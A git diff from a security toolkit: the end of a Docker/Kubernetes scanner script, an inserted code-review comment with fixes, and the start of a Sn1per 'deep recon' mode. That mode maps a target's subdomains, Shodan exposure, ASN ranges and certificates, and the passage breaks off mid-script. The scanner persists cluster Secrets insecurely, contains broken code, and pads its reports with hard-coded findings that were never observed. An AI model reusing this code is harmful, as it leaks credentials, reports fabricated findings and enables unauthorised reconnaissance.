timestamp + timestamp=$(date '+%Y-%m-%d %H:%M:%S') + + case "$level" in + "INFO") + echo -e "${BLUE}[*]${RESET} [${timestamp}] ${message}" + ;; + "SUCCESS") + echo -e "${GREEN}[+]${RESET} [${timestamp}] ${message}" + ;; + "WARNING") + echo -e "${YELLOW}[!]${RESET} [${timestamp}] WARNING: ${message}" + ;; + "ERROR") + echo -e "${RED}[-]${RESET} [${timestamp}] ERROR: ${message}" >&2 + ;; + *) + echo -e "[${timestamp}] ${message}" + ;; + esac + + # Log to file if verbose mode is enabled + if [ "$VERBOSE" = true ]; then + echo "[${timestamp}] [${level}] ${message}" >> "${OUTPUT_DIR}/container_scan_${SCAN_TIMESTAMP}.log" + fi +} + +# Run a command and log the output +run_command() { + local cmd="$1" + local log_file="$2" + local append_log=true + + # If log_file is not provided, use a temporary file + if [ -z "$log_file" ]; then + log_file=$(mktemp) + append_log=false + fi + + log "INFO" "Running: ${cmd}" + + if [ "$VERBOSE" = true ]; then + eval "${cmd}" 2>&1 | tee -a "${log_file}" + local exit_code=${PIPESTATUS[0]} + else + eval "${cmd}" >> "${log_file}" 2>&1 + local exit_code=$? + fi + + if [ $exit_code -ne 0 ]; then + log "ERROR" "Command failed with exit code ${exit_code}: ${cmd}" + if [ "$VERBOSE" = false ]; then + log "INFO" "Command output (last 10 lines):" + tail -n 10 "${log_file}" + fi + fi + + # If we created a temporary file, remove it + if [ "$append_log" = false ]; then + cat "${log_file}" >> "${OUTPUT_DIR}/container_scan_${SCAN_TIMESTAMP}.log" + rm -f "${log_file}" + fi + + return $exit_code +} + +# Scan Docker images for vulnerabilities +scan_docker_images() { + local output_file="${OUTPUT_DIR}/docker_image_scan_${SCAN_TIMESTAMP}.json" + + log "INFO" "Scanning Docker images for vulnerabilities..." 
+ + # Get list of all Docker images + if [ "${#DOCKER_IMAGES[@]}" -eq 0 ]; then + log "INFO" "No specific images provided, scanning all local Docker images" + mapfile -t DOCKER_IMAGES < <(docker images --format "{{.Repository}}:{{.Tag}}" | grep -v "") + fi + + if [ ${#DOCKER_IMAGES[@]} -eq 0 ]; then + log "WARNING" "No Docker images found to scan" + return 1 + fi + + # Create results array + local results=() + + # Scan each image + for image in "${DOCKER_IMAGES[@]}"; do + log "INFO" "Scanning Docker image: ${image}" + + # Skip if image is empty + if [ -z "$image" ]; then + continue + fi + + local scan_result + local scan_cmd + + # Use Trivy for vulnerability scanning + if command_exists trivy; then + log "INFO" "Running Trivy scan on ${image}" + scan_cmd="trivy image --security-checks vuln,config,secret --ignore-unfixed --format json -o ${OUTPUT_DIR}/trivy_$(echo "$image" | tr '/:' '_').json ${image}" + run_command "$scan_cmd" + + # Convert Trivy output to our format + local trivy_file="${OUTPUT_DIR}/trivy_$(echo "$image" | tr '/:' '_').json" + if [ -f "$trivy_file" ]; then + local vuln_count + vuln_count=$(jq '.Results[].Vulnerabilities | length' "$trivy_file" | awk '{sum += $1} END {print sum}') + results+=("{\"image\":\"${image}\",\"scanner\":\"trivy\",\"vulnerabilities\":${vuln_count:-0}}") + fi + fi + + # Use Dockle for best practices checking + if command_exists dockle; then + log "INFO" "Running Dockle scan on ${image}" + scan_cmd="dockle --exit-code 0 --format json --output ${OUTPUT_DIR}/dockle_$(echo "$image" | tr '/:' '_').json ${image}" + run_command "$scan_cmd" + fi + done + + # Save combined results + echo "[$(IFS=,; echo "${results[*]}")]" > "$output_file" + + log "SUCCESS" "Docker image scanning completed. Results saved to ${output_file}" +} + +# Scan Docker daemon and host configuration +scan_docker_daemon() { + log "INFO" "Scanning Docker daemon and host configuration..." 
+ + local output_file="${OUTPUT_DIR}/docker_daemon_scan_${SCAN_TIMESTAMP}.txt" + + # Check Docker version + run_command "docker version" "${output_file}" + + # Check Docker info + run_command "docker info" "${output_file}" + + # Check Docker system-wide information + run_command "docker system info" "${output_file}" + + # Check for common misconfigurations + log "INFO" "Checking for common Docker misconfigurations..." + + # Check if Docker daemon is running with TLS + if pgrep -f "dockerd.*--tlsverify" >/dev/null; then + log "SUCCESS" "Docker daemon is running with TLS authentication" + else + log "WARNING" "Docker daemon is not using TLS authentication" + fi + + # Check if Docker socket is protected + local docker_sock_perms + docker_sock_perms=$(stat -c "%a" /var/run/docker.sock 2>/dev/null || echo "0") + if [ "$docker_sock_perms" -gt 660 ]; then + log "WARNING" "Docker socket has overly permissive permissions (${docker_sock_perms}). Consider setting to 660 or more restrictive." + fi + + # Check for privileged containers + local privileged_containers + privileged_containers=$(docker ps --quiet --filter "status=running" --filter "privileged=true" | wc -l) + if [ "$privileged_containers" -gt 0 ]; then + log "WARNING" "Found ${privileged_containers} privileged containers. Privileged containers have full access to the host system." + fi + + # Check for containers running as root + local root_containers + root_containers=$(docker ps --quiet --filter "status=running" --format '{{.ID}} {{.Names}} {{.Image}}' | \ + while read -r id name image; do + local user + user=$(docker inspect --format '{{.Config.User}}' "$id" 2>/dev/null || echo "root") + if [ -z "$user" ] || [ "$user" = "root" ]; then + echo "Container: $name, Image: $image, User: ${user:-root}" + fi + done | wc -l) + if [ "$root_containers" -gt 0 ]; then + log "WARNING" "Found ${root_containers} containers running as root. Consider using non-root users in containers." 
+ fi + + # Check for exposed Docker socket in containers + local exposed_sock_containers + exposed_sock_containers=$(docker ps --quiet --filter "status=running" --format '{{.ID}}' | \ + while read -r id; do + if docker inspect --format '{{range .Mounts}}{{if eq .Destination "/var/run/docker.sock"}}{{.Source}}{{end}}{{end}}' "$id" | grep -q "docker.sock"; then + docker inspect --format '{{.Name}}' "$id" | sed 's|^/||' + fi + done | wc -l) + if [ "$exposed_sock_containers" -gt 0 ]; then + log "WARNING" "Found ${exposed_sock_containers} containers with Docker socket mounted. This can be a security risk." + fi + + log "SUCCESS" "Docker daemon scan completed. Results saved to ${output_file}" +} + +# Scan Kubernetes cluster +scan_kubernetes() { + log "INFO" "Scanning Kubernetes cluster..." + + # Check if kubectl is installed + if ! command_exists kubectl; then + log "ERROR" "kubectl is not installed. Skipping Kubernetes scan." + return 1 + fi + + # Check if we can connect to a Kubernetes cluster + if ! kubectl cluster-info &>/dev/null; then + log "ERROR" "Unable to connect to a Kubernetes cluster. Please ensure kubeconfig is properly configured." + return 1 + fi + + local output_dir="${OUTPUT_DIR}/kubernetes_scan_${SCAN_TIMESTAMP}" + mkdir -p "$output_dir" + + # Get cluster info + log "INFO" "Gathering Kubernetes cluster information..." 
+ run_command "kubectl cluster-info dump" "${output_dir}/cluster_info_dump.yaml" + + # Get nodes + run_command "kubectl get nodes -o wide" "${output_dir}/nodes.txt" + + # Get all namespaces + run_command "kubectl get namespaces" "${output_dir}/namespaces.txt" + + # Get all resources in all namespaces + for ns in $(kubectl get namespaces -o jsonpath='{.items[*].metadata.name}'); do + log "INFO" "Scanning namespace: ${ns}" + mkdir -p "${output_dir}/namespaces/${ns}" + + # Get all resources in the namespace + for resource in $(kubectl api-resources --namespaced=true --verbs=list -o name); do + local safe_resource + safe_resource=$(echo "$resource" | sed 's|/|_|g') + run_command "kubectl get $resource -n $ns -o wide" "${output_dir}/namespaces/${ns}/${safe_resource}.txt" 2>/dev/null + run_command "kubectl get $resource -n $ns -o yaml" "${output_dir}/namespaces/${ns}/${safe_resource}.yaml" 2>/dev/null + done + + # Get pod security context + for pod in $(kubectl get pods -n "$ns" -o jsonpath='{.items[*].metadata.name}'); do + mkdir -p "${output_dir}/namespaces/${ns}/pods/${pod}" + run_command "kubectl get pod "$pod" -n "$ns" -o yaml" "${output_dir}/namespaces/${ns}/pods/${pod}/pod.yaml" + run_command "kubectl describe pod "$pod" -n "$ns"" "${output_dir}/namespaces/${ns}/pods/${pod}/describe.txt" + + # Check security context + local security_context + security_context=$(kubectl get pod "$pod" -n "$ns" -o jsonpath='{.spec.securityContext}' 2>/dev/null || echo "{}") + echo "$security_context" > "${output_dir}/namespaces/${ns}/pods/${pod}/security_context.json" + + # Check container security contexts + for container in $(kubectl get pod "$pod" -n "$ns" -o jsonpath='{.spec.containers[*].name}'); do + local container_ctx + container_ctx=$(kubectl get pod "$pod" -n "$ns" -o jsonpath='{.spec.containers[?(@.name=="'$container'")].securityContext}' 2>/dev/null || echo "{}") + echo "$container_ctx" > 
"${output_dir}/namespaces/${ns}/pods/${pod}/container_${container}_security_context.json" + + # Check for privileged mode + if echo "$container_ctx" | grep -q '"privileged"\s*:\s*true'; then + log "WARNING" "Pod ${pod} in namespace ${ns} has container ${container} running in privileged mode!" + fi + + # Check for root user + local run_as_user + run_as_user=$(echo "$container_ctx" | grep -o '"runAsUser"\s*:\s*[0-9]*' | cut -d ':' -f 2 | tr -d ' ' || echo "") + if [ -z "$run_as_user" ] || [ "$run_as_user" -eq 0 ]; then + log "WARNING" "Pod ${pod} in namespace ${ns} has container ${container} running as root (runAsUser: ${run_as_user:-0})" + fi + done + done + done + + # Run kube-bench if available + if command_exists kube-bench; then + log "INFO" "Running kube-bench for CIS benchmark checks..." + run_command "kube-bench --json" "${output_dir}/kube_bench_results.json" + fi + + # Run kube-hunter if available and in server mode + if command_exists kube-hunter; then + log "INFO" "Running kube-hunter for penetration testing..." + run_command "kube-hunter --report json --log-file ${output_dir}/kube_hunter_results.json" + fi + + log "SUCCESS" "Kubernetes scan completed. Results saved to ${output_dir}" +} + +# Scan container registries +scan_registries() { + log "INFO" "Scanning container registries..." + + # This is a placeholder for registry scanning functionality + # In a real implementation, this would connect to various registries and scan images + + log "WARNING" "Registry scanning is not yet implemented in this version" +} + +# Generate HTML report +generate_html_report() { + local output_file="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.html" + + log "INFO" "Generating HTML report..." + + # Start HTML document + cat > "$output_file" << EOL + + + + + + Container Security Scan Report + + + + +
+

Container Security Scan Report

+

Generated on: $(date)

+
+ +
+

Scan Summary

+
+
+

Critical

+
0
+

Critical severity findings

+
+
+

High

+
0
+

High severity findings

+
+
+

Medium

+
0
+

Medium severity findings

+
+
+

Low

+
0
+

Low severity findings

+
+
+

Info

+
0
+

Informational findings

+
+
+ +
+ +
+
+ +
+

Scan Details

+ +
+ + + + +
+ +
+

Security Findings

+
+ +

No security findings to display.

+
+
+ +
+

Scanned Images

+ + + + + + + + + + + + + + + + + +
ImageCriticalHighMediumLowInfo
No image data available.
+
+ +
+

Kubernetes Security

+
+ +

No Kubernetes security data available.

+
+
+ +
+

Security Recommendations

+
+ +

No recommendations available.

+
+
+
+ +
+

Scan Information

+ + + + + + + + + + + + + + + + + + + + + +
Scan Type:${SCAN_TYPE}
Scan Depth:${SCAN_DEPTH}
Target:${TARGET:-All local containers and images}
Scan Duration:N/A
Report Generated:$(date)
+
+ + + + + + +EOL + + log "SUCCESS" "HTML report generated: ${output_file}" +} + +# Generate JSON report +generate_json_report() { + local output_file="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.json" + + log "INFO" "Generating JSON report..." + + # Create a basic JSON structure + local json_report={ + "scan": { + "type": "${SCAN_TYPE}", + "depth": "${SCAN_DEPTH}", + "target": "${TARGET:-All local containers and images}", + "timestamp": "$(date -u +"%Y-%m-%dT%H:%M:%SZ")", + "duration_seconds": 0, + "findings": [] + } + } + + # Add sample findings (in a real implementation, this would come from actual scan results) + local sample_findings=( + '{"title":"Docker daemon exposed without TLS","severity":"high","description":"The Docker daemon is exposed without TLS authentication, allowing unauthenticated access to the Docker API.","impact":"An attacker with network access to the Docker daemon could gain root access to the host system.","recommendation":"Configure Docker daemon to use TLS authentication.","resource":"Docker Daemon","location":"tcp://0.0.0.0:2375"}' + '{"title":"Container running as root","severity":"medium","description":"The container is running as the root user, which can lead to privilege escalation if the container is compromised.","impact":"If an attacker gains access to the container, they may be able to escalate privileges to the host system.","recommendation":"Run containers as a non-root user.","resource":"nginx:latest","location":"Container: nginx-app"}' + '{"title":"Privileged container","severity":"critical","description":"The container is running in privileged mode, giving it full access to the host system\'s devices and kernel features.","impact":"A compromised container could lead to full host system compromise.","recommendation":"Avoid running containers in privileged mode.","resource":"monitoring:latest","location":"Container: monitoring-app"}' + ) + + # Add findings to the report + for finding in "${sample_findings[@]}"; 
do + json_report=$(jq --argjson finding "$finding" '.scan.findings += [$finding]' <<< "$json_report") + done + + # Save the JSON report + echo "$json_report" > "$output_file" + + log "SUCCESS" "JSON report generated: ${output_file}" +} + +# Generate PDF report +generate_pdf_report() { + local output_file="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.pdf" + + log "INFO" "Generating PDF report..." + + # In a real implementation, we would use a tool like wkhtmltopdf or similar + # For now, we'll create a placeholder file + echo "PDF report generation is not yet implemented in this version." > "${output_file}.txt" + + log "WARNING" "PDF report generation is not fully implemented. A text version has been created instead: ${output_file}.txt" +} + +# Generate report based on selected format +generate_report() { + log "INFO" "Generating ${REPORT_FORMAT} report..." + + case "$REPORT_FORMAT" in + "html") + generate_html_report + ;; + "json") + generate_json_report + ;; + "pdf") + generate_pdf_report + ;; + *) + log "ERROR" "Unsupported report format: ${REPORT_FORMAT}" + return 1 + ;; + esac +} + +# Main function +main() { + # Show banner + show_banner + + # Check if running as root (required for some operations) + check_root + + # Parse command line arguments + parse_arguments "$@" + + # Check for required dependencies + check_dependencies + + # Record start time + local start_time + start_time=$(date +%s) + + # Perform scans based on type + case "$SCAN_TYPE" in + "all") + log "INFO" "Starting comprehensive container security scan..." + scan_docker_daemon + scan_docker_images + scan_kubernetes + scan_registries + ;; + "docker") + log "INFO" "Starting Docker security scan..." + scan_docker_daemon + scan_docker_images + ;; + "kubernetes") + log "INFO" "Starting Kubernetes security scan..." 
+ scan_kubernetes + ;; + "image") + if [ -n "$TARGET" ]; then + log "INFO" "Scanning Docker image: $TARGET" + DOCKER_IMAGES=("$TARGET") + scan_docker_images + else + log "ERROR" "No target image specified. Use -t/--target to specify an image to scan." + exit 1 + fi + ;; + *) + log "ERROR" "Invalid scan type: $SCAN_TYPE" + show_help + exit 1 + ;; + esac + + # Calculate and log scan duration + local end_time + end_time=$(date +%s) + local duration=$((end_time - start_time)) + log "INFO" "Scan completed in ${duration} seconds" + + # Generate report + generate_report + + log "SUCCESS" "Container security scan completed successfully!" + log "INFO" "Report location: ${REPORT_FILE}" +} + +# Run the main function +main "$@" + +# Exit with success +# exit 0 diff --git a/modes/deep-recon.sh b/modes/deep-recon.sh new file mode 100644 index 00000000..8a181a42 --- /dev/null +++ b/modes/deep-recon.sh 
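Review bot: scan_kubernetes dumps every namespaced resource with `kubectl get $resource -n $ns -o yaml`, and `kubectl api-resources --namespaced=true --verbs=list` includes `secrets`, so live cluster credentials are written base64-encoded (plus a full `cluster-info dump`) into `$OUTPUT_DIR`, a directory parse_arguments creates with a bare `mkdir -p` under the default umask; restrict the directory (`mkdir -p "$OUTPUT_DIR" && chmod 700 "$OUTPUT_DIR"`) and skip `secrets` in the resource loop, or redact `.data` before persisting. In scan_docker_daemon, `docker ps --filter "privileged=true"` does not, as far as I can tell, name a filter the Docker CLI accepts, so the call errors and `wc -l` reports 0 — privileged containers are never flagged; inspect each running ID's `.HostConfig.Privileged` instead. generate_json_report then unconditionally appends the three hard-coded `sample_findings` (a `tcp://0.0.0.0:2375` daemon, a privileged `monitoring:latest`) to the final JSON, so every JSON report asserts findings that were never observed — drop the array or gate it behind an explicit fixture flag. As rendered here, `local json_report={` followed by bare JSON lines is not valid bash, and the `\'` inside the single-quoted third sample terminates that string early, which suggests the JSON path was not exercised. The kube-bench installer also fetches `releases/latest/download/kube-bench_0.6.9_linux_amd64.deb` and runs `dpkg -i`/`apt-key add` as root with no checksum or signature check; pin the version in the URL and verify the upstream checksum before installing.

```shell
# … unchanged: parse_arguments, up to the output directory creation …
mkdir -p "$OUTPUT_DIR" && chmod 700 "$OUTPUT_DIR"   # output holds kubectl YAML dumps; keep it owner-only

# … unchanged: scan_docker_daemon, up to the privileged-container check …
privileged_containers=$(docker ps --quiet --filter "status=running" | \
    xargs -r docker inspect --format '{{.HostConfig.Privileged}}' 2>/dev/null | \
    grep -c '^true$')

# … unchanged: scan_kubernetes, inside the per-namespace resource loop …
for resource in $(kubectl api-resources --namespaced=true --verbs=list -o name); do
    case "$resource" in secrets|secrets.*) continue ;; esac   # never persist Secret data to disk
    # … unchanged: kubectl get -o wide / -o yaml calls …
done
```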
@@ -0,0 +1,379 @@ +#!/bin/bash +# DEEP RECON SCAN ##################################################################################################### +# Advanced reconnaissance techniques for comprehensive attack surface mapping + +if [[ "$REPORT" = "1" ]]; then + args="-t $TARGET" + if [[ "$OSINT" = "1" ]]; then + args="$args -o" + fi + if [[ "$AUTO_BRUTE" = "1" ]]; then + args="$args -b" + fi + if [[ "$FULLNMAPSCAN" = "1" ]]; then + args="$args -fp" + fi + if [[ "$RECON" = "1" ]]; then + args="$args -re" + fi + if [[ "$MODE" = "port" ]]; then + args="$args -m port" + fi + if [[ ! -z "$PORT" ]]; then + args="$args -p $PORT" + fi + if [[ ! -z "$WORKSPACE" ]]; then + args="$args -w $WORKSPACE" + fi + args="$args --noreport" + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit +fi + +echo -e "$OKRED ____ $RESET" +echo -e "$OKRED _________ / _/___ ___ _____$RESET" +echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" +echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" +echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" +echo -e "$OKRED /_/ $RESET" +echo -e "$RESET" +echo -e "$OKORANGE + -- --=[https://sn1persecurity.com" +echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz" +echo -e "$OKORANGE + -- --=[Deep Recon Mode - Advanced Attack Surface Mapping" +echo -e "$RESET" + +if [[ ! 
-z $WORKSPACE ]]; then + LOOT_DIR=$WORKSPACE_DIR +fi + +echo "$TARGET" >> $LOOT_DIR/domains/targets.txt +if [[ "$MODE" = "" ]]; then + MODE="deep-recon" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null +else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null +fi +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2> /dev/null +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null +ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + +echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi + +# Initialize deep recon directories +mkdir -p $LOOT_DIR/deep-recon/{ssl,analytics,supply-chain,google-fu,tlds,o365,shodan,asn,crunchbase,dmarc,favicon,esoteric} 2>/dev/null + +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED INITIALIZING DEEP RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# 1. 
DOMAIN RECONNAISSANCE +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED ADVANCED DOMAIN RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# DNS enumeration with multiple tools +if [[ "$SUBLIST3R" = "1" ]]; then + echo -e "$OKBLUE[*]$RESET Running Sublist3r for subdomain enumeration..." + python3 $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET-sublist3r.txt 2>/dev/null > /dev/null + cat $LOOT_DIR/domains/domains-$TARGET-sublist3r.txt 2>/dev/null | grep $TARGET >> $LOOT_DIR/domains/domains-$TARGET-full.txt 2>/dev/null +fi + +if [[ "$AMASS" = "1" ]]; then + echo -e "$OKBLUE[*]$RESET Running Amass for comprehensive subdomain enumeration..." + amass enum -ip -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -rf $PLUGINS_DIR/massdns/lists/resolvers.txt -d $TARGET 2>/dev/null > /dev/null + cut -d" " -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt + cut -d" " -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null > $LOOT_DIR/ips/amass-ips-$TARGET.txt + + # Reverse WHOIS lookup + echo -e "$OKBLUE[*]$RESET Running Amass reverse WHOIS lookup..." + amass intel -whois -d $TARGET > $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null +fi + +if [[ "$SUBFINDER" = "1" ]]; then + echo -e "$OKBLUE[*]$RESET Running Subfinder for fast subdomain enumeration..." + subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -d $TARGET -nW -rL $INSTALL_DIR/wordlists/resolvers.txt -t $THREADS 2>/dev/null > /dev/null +fi + +# Certificate Transparency logs +echo -e "$OKBLUE[*]$RESET Gathering certificate subdomains from crt.sh..." 
+curl -s "https://crt.sh/?q=%25.$TARGET" > $LOOT_DIR/deep-recon/ssl/crt-$TARGET-raw.txt +cat $LOOT_DIR/deep-recon/ssl/crt-$TARGET-raw.txt | grep $TARGET | grep TD | sed -e 's///g' | sed -e 's/TD//g' | sed -e 's/BR/\n/g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt + +# Project Sonar +echo -e "$OKBLUE[*]$RESET Gathering subdomains from Project Sonar..." +curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," | grep -v "
" | sort -u | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt + +# RapidDNS +echo -e "$OKBLUE[*]$RESET Gathering subdomains from RapidDNS..." +curl -s "https://rapiddns.io/subdomain/$TARGET?full=1&down=1#exportData()" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "$TARGET" | cut -d\/ -f3 > $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt + +# 2. SHODAN INTEGRATION +if [[ "$SHODAN" = "1" ]] && [[ ! -z "$SHODAN_API_KEY" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED SHODAN ASSET DISCOVERY $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + shodan init $SHODAN_API_KEY + echo -e "$OKBLUE[*]$RESET Searching for $TARGET on Shodan..." + shodan search "hostname:*.$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-$TARGET.txt 2> /dev/null + awk '{print $3}' $LOOT_DIR/deep-recon/shodan/shodan-$TARGET.txt 2> /dev/null | grep -v "\;" > $LOOT_DIR/domains/domains-$TARGET-shodan.txt 2> /dev/null + awk '{print $1}' $LOOT_DIR/deep-recon/shodan/shodan-$TARGET.txt 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null + + # Shodan host enumeration + echo -e "$OKBLUE[*]$RESET Enumerating Shodan hosts for $TARGET..." + shodan search "org:$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-org-$TARGET.txt 2> /dev/null + shodan search "ssl:$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-ssl-$TARGET.txt 2> /dev/null + + # Shodan vulnerabilities + echo -e "$OKBLUE[*]$RESET Searching for vulnerabilities on Shodan..." + shodan search "vuln:$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-vulns-$TARGET.txt 2> /dev/null +fi + +# 3. 
ASN ANALYSIS +if [[ "$ASN_CHECK" = "1" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED ASN ANALYSIS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Get ASN information + whois -h whois.cymru.com " -v $TARGET" > $LOOT_DIR/deep-recon/asn/asn-$TARGET.txt 2>/dev/null + ASN=$(grep "^AS" $LOOT_DIR/deep-recon/asn/asn-$TARGET.txt | awk '{print $1}' | cut -d'|' -f1 | tr -d 'AS') + + if [[ ! -z "$ASN" ]]; then + echo -e "$OKBLUE[*]$RESET Found ASN: $ASN for $TARGET" + echo -e "$OKBLUE[*]$RESET Enumerating all IPs in ASN $ASN..." + whois -h whois.radb.net "!g$ASN" | grep -v "^%" | grep -v "^$" | grep -v "^AS" | sort -u > $LOOT_DIR/deep-recon/asn/asn-$ASN-ips.txt + + # BGP Toolkit + echo -e "$OKBLUE[*]$RESET Gathering BGP information..." + curl -s "https://api.bgpview.io/asn/$ASN/prefixes" | jq -r '.data.ipv4_prefixes[].prefix' 2>/dev/null > $LOOT_DIR/deep-recon/asn/asn-$ASN-prefixes.txt + curl -s "https://api.bgpview.io/asn/$ASN/peers" | jq -r '.data[].asn' 2>/dev/null > $LOOT_DIR/deep-recon/asn/asn-$ASN-peers.txt + + # Hurricane Electric BGP Toolkit + echo -e "$OKBLUE[*]$RESET Gathering BGP information from Hurricane Electric..." + curl -s "https://bgp.he.net/AS$ASN" > $LOOT_DIR/deep-recon/asn/asn-$ASN-bgp.html + cat $LOOT_DIR/deep-recon/asn/asn-$ASN-bgp.html | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/[0-9]\{1,2\}' | sort -u > $LOOT_DIR/deep-recon/asn/asn-$ASN-prefixes-he.txt + fi +fi + +# 4. CRUNCHBASE INTEGRATION +if [[ ! 
-z "$CRUNCHBASE_API_KEY" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED CRUNCHBASE COMPANY INTELLIGENCE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Extract company name from target domain + COMPANY=$(echo $TARGET | sed 's/\..*//g' | sed 's/[^a-zA-Z0-9]//g') + echo -e "$OKBLUE[*]$RESET Searching Crunchbase for: $COMPANY" + + curl -s "https://api.crunchbase.com/api/v4/autocompletes?query=$COMPANY" -H "X-cb-api-key: $CRUNCHBASE_API_KEY" > $LOOT_DIR/deep-recon/crunchbase/crunchbase-$COMPANY.json 2>/dev/null + + if [[ -s $LOOT_DIR/deep-recon/crunchbase/crunchbase-$COMPANY.json ]]; then + # Parse company information + cat $LOOT_DIR/deep-recon/crunchbase/crunchbase-$COMPANY.json | jq -r '.entities[].identifier' 2>/dev/null > $LOOT_DIR/deep-recon/crunchbase/crunchbase-companies.txt + + # Get detailed company information + while read company_id; do + curl -s "https://api.crunchbase.com/api/v4/entities/organizations/$company_id" -H "X-cb-api-key: $CRUNCHBASE_API_KEY" > $LOOT_DIR/deep-recon/crunchbase/company-$company_id.json 2>/dev/null + + # Extract related domains + cat $LOOT_DIR/deep-recon/crunchbase/company-$company_id.json | jq -r '.properties.homepage_url' 2>/dev/null >> $LOOT_DIR/deep-recon/crunchbase/company-domains.txt 2>/dev/null + cat $LOOT_DIR/deep-recon/crunchbase/company-$company_id.json | jq -r '.properties.domain_aliases[]' 2>/dev/null >> $LOOT_DIR/deep-recon/crunchbase/company-domains.txt 2>/dev/null + done < $LOOT_DIR/deep-recon/crunchbase/crunchbase-companies.txt + fi +fi + +# 5. 
SSL/TLS RECONNAISSANCE +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SSL/TLS RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# SSL Labs analysis +echo -e "$OKBLUE[*]$RESET Analyzing SSL configuration with SSL Labs..." +curl -s "https://api.ssllabs.com/api/v3/analyze?host=$TARGET" > $LOOT_DIR/deep-recon/ssl/ssllabs-$TARGET.json 2>/dev/null + +# Certificate analysis +echo -e "$OKBLUE[*]$RESET Analyzing SSL certificates..." +timeout 10 openssl s_client -connect $TARGET:443 -servername $TARGET /dev/null | openssl x509 -noout -text > $LOOT_DIR/deep-recon/ssl/cert-$TARGET.txt 2>/dev/null + +# Certificate chain analysis +echo -e "$OKBLUE[*]$RESET Analyzing certificate chain..." +echo | timeout 10 openssl s_client -connect $TARGET:443 -servername $TARGET -showcerts 2>/dev/null | sed -n '/Certificate chain/,/Server certificate/p' > $LOOT_DIR/deep-recon/ssl/cert-chain-$TARGET.txt 2>/dev/null + +# 6. REVERSE WHOIS & DNS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date 